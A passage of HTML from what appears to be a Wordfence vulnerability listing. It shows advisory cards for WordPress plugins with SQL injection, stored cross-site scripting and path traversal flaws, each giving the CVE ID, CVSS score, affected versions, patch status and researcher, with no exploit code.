<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65451" target="_blank" rel="noopener noreferrer">							CVE-2026-65451						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapsvg" target="_blank" rel="noopener">MapSVG</a> <span class="wfvr-software-slug">[mapsvg]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/15c7bc3e71963fdd7c656346bcf8b159.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="15c7bc3e71963fdd7c656346bcf8b159"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener">Trương Hữu Phúc (truonghuuphuc)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82299c65-2d27-472f-85c8-9e8b3d8ff02b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9bc6d516-7636-45b2-ade1-c8f2297f0ea1" target="_blank" rel="noopener">Premium Packages &lt;= 7.0.4 &#8211; Authenticated (Admin+) SQL Injection via &#8216;orderby&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15906" target="_blank" rel="noopener noreferrer">							CVE-2026-15906						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">Premium Packages – Sell Digital Products Securely</a> <span class="wfvr-software-slug">[wpdm-premium-packages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9bc6d516-7636-45b2-ade1-c8f2297f0ea1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/316e98ba-c497-416e-9286-1d67daeb3fd4" target="_blank" rel="noopener">Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker &lt;= 11.2.0 &#8211; Authenticated (Contributor+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65454" target="_blank" rel="noopener noreferrer">							CVE-2026-65454						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next" target="_blank" rel="noopener">Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker</a> <span class="wfvr-software-slug">[quiz-master-next]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-chu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/33751fc657c409bebde901e7bad75981.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33751fc657c409bebde901e7bad75981"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-chu" target="_blank" rel="noopener">anhcd05</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/316e98ba-c497-416e-9286-1d67daeb3fd4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/630cc68e-102e-4e05-98ff-94de434a10ae" target="_blank" rel="noopener">Registrations for the Events Calendar &lt;= 3.2 &#8211; Authenticated (Contributor+) SQL Injection via &#8216;standard&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13119" target="_blank" rel="noopener noreferrer">							CVE-2026-13119						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/registrations-for-the-events-calendar" target="_blank" rel="noopener">Registrations for the Events Calendar – Event Registration Plugin</a> <span class="wfvr-software-slug">[registrations-for-the-events-calendar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/630cc68e-102e-4e05-98ff-94de434a10ae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6b749ed7-ca41-4b3d-a30e-e9abdbc98fab" target="_blank" rel="noopener">rtMedia for WordPress, BuddyPress and bbPress &lt;= 4.7.10 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59551" target="_blank" rel="noopener noreferrer">							CVE-2026-59551						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress-media" target="_blank" rel="noopener">rtMedia for WordPress, BuddyPress and bbPress</a> <span class="wfvr-software-slug">[buddypress-media]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6b749ed7-ca41-4b3d-a30e-e9abdbc98fab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/786ef53a-0fcd-4226-b469-52b72cd6890c" target="_blank" rel="noopener">Tickera &lt;= 3.6.0.1 &#8211; Authenticated (Staff+) SQL Injection via &#8216;tc_event_filter&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15761" target="_blank" rel="noopener noreferrer">							CVE-2026-15761						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tickera-event-ticketing-system" target="_blank" rel="noopener">Tickera – Sell Tickets &amp; Manage Events</a> <span class="wfvr-software-slug">[tickera-event-ticketing-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/786ef53a-0fcd-4226-b469-52b72cd6890c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8972b507-4aae-40cc-a79e-2603dbdc70c0" target="_blank" rel="noopener">Tickera &lt;= 3.6.0.1 &#8211; Authenticated (Staff+) SQL Injection via &#8216;tc_order_status_filter&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15448" target="_blank" rel="noopener noreferrer">							CVE-2026-15448						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tickera-event-ticketing-system" target="_blank" rel="noopener">Tickera – Sell Tickets &amp; Manage Events</a> <span class="wfvr-software-slug">[tickera-event-ticketing-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8972b507-4aae-40cc-a79e-2603dbdc70c0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/65b54e53-ec14-4dae-bcc1-1ca9b4128324" target="_blank" rel="noopener">Visualizer – Tables &amp; Charts Manager with Built-in AI Generator &lt;= 4.0.6 &#8211; Authenticated (Contributor+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65526" target="_blank" rel="noopener noreferrer">							CVE-2026-65526						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualizer" target="_blank" rel="noopener">Visualizer – Tables &amp; Charts Manager with Built-in AI Generator</a> <span class="wfvr-software-slug">[visualizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/parkhyunwoo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f005c4dc82929a63b828a2192c5e7c02.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f005c4dc82929a63b828a2192c5e7c02"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/parkhyunwoo" target="_blank" rel="noopener">ParkHyunWoo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/65b54e53-ec14-4dae-bcc1-1ca9b4128324" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0148c70f-38e4-43d9-994e-f2b01dd168a1" target="_blank" rel="noopener">WCPOS &lt;= 1.9.8 &#8211; Authenticated (Shop Manager+) Path Traversal to Arbitrary File Read via &#8216;type&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16078" target="_blank" rel="noopener noreferrer">							CVE-2026-16078						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-pos" target="_blank" rel="noopener">WCPOS – Point of Sale (POS) plugin for WooCommerce</a> <span class="wfvr-software-slug">[woocommerce-pos]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0148c70f-38e4-43d9-994e-f2b01dd168a1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/083fa428-a13f-4a3a-97e8-316a3856b281" target="_blank" rel="noopener">Accept Donations with PayPal &amp; Stripe &lt;= 1.5.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65518" target="_blank" rel="noopener noreferrer">							CVE-2026-65518						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-paypal-donation" target="_blank" rel="noopener">Accept Donations with PayPal &amp; Stripe</a> <span class="wfvr-software-slug">[easy-paypal-donation]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/083fa428-a13f-4a3a-97e8-316a3856b281" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c20e0552-1ff6-43d9-be87-f6c482f1866e" target="_blank" rel="noopener">Appointment Hour Booking – Booking Calendar &lt;= 1.5.86 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65514" target="_blank" rel="noopener noreferrer">							CVE-2026-65514						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/appointment-hour-booking" target="_blank" rel="noopener">Appointment Hour Booking – Booking Calendar</a> <span class="wfvr-software-slug">[appointment-hour-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c20e0552-1ff6-43d9-be87-f6c482f1866e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4b9fe250-3791-4808-918b-c1febbebf51b" target="_blank" rel="noopener">BetterDocs –  AI Documentation, Knowledge Base, Docs, Wikis, FAQ with Chatbot &lt;= 4.6.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65562" target="_blank" rel="noopener noreferrer">							CVE-2026-65562						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/betterdocs" target="_blank" rel="noopener">BetterDocs –  AI Documentation, Knowledge Base, Docs, Wikis, FAQ with Chatbot</a> <span class="wfvr-software-slug">[betterdocs]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4b9fe250-3791-4808-918b-c1febbebf51b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8fa3bcb9-df3e-4042-a28b-3d09bfebeebc" target="_blank" rel="noopener">Brands for WooCommerce &lt;= 3.8.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;style&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15646" target="_blank" rel="noopener noreferrer">							CVE-2026-15646						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/brands-for-woocommerce" target="_blank" rel="noopener">Brands for WooCommerce</a> <span class="wfvr-software-slug">[brands-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8fa3bcb9-df3e-4042-a28b-3d09bfebeebc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3efb5f5c-64d2-4819-82bf-45574df94209" target="_blank" rel="noopener">Brands for WooCommerce &lt;= 3.8.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;width&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15648" target="_blank" rel="noopener noreferrer">							CVE-2026-15648						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/brands-for-woocommerce" target="_blank" rel="noopener">Brands for WooCommerce</a> <span class="wfvr-software-slug">[brands-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3efb5f5c-64d2-4819-82bf-45574df94209" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
